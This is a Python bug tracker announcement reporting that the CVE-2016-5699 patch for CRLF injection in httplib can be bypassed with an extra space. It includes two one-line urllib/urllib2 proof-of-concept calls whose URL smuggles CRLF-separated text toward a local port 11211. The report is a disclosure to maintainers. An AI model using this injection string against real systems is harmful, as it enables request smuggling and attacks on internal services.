[New-bugs-announce] [issue30458] CRLF Injection in httplib
Orange
report at bugs.python.org
Wed May 24 11:01:31 EDT 2017
New submission from Orange:
Hi, the patch in CVE-2016-5699 can be broke by an addition space.
http://www.cvedetails.com/cve/CVE-2016-5699/
https://hg.python.org/cpython/rev/bf3e1c9b80e9
https://hg.python.org/cpython/rev/1c45047c5102
import urllib, urllib2
urllib.urlopen('http://127.0.0.1\r\n\x20hihi\r\n :11211')
urllib2.urlopen('http://127.0.0.1\r\n\x20hihi\r\n :11211')
----------
components: Library (Lib)
messages: 294360
nosy: orange
priority: normal
severity: normal
status: open
title: CRLF Injection in httplib
versions: Python 2.7
_______________________________________
Python tracker <report at bugs.python.org>
<http://bugs.python.org/issue30458>
_______________________________________
More information about the New-bugs-announce
mailing list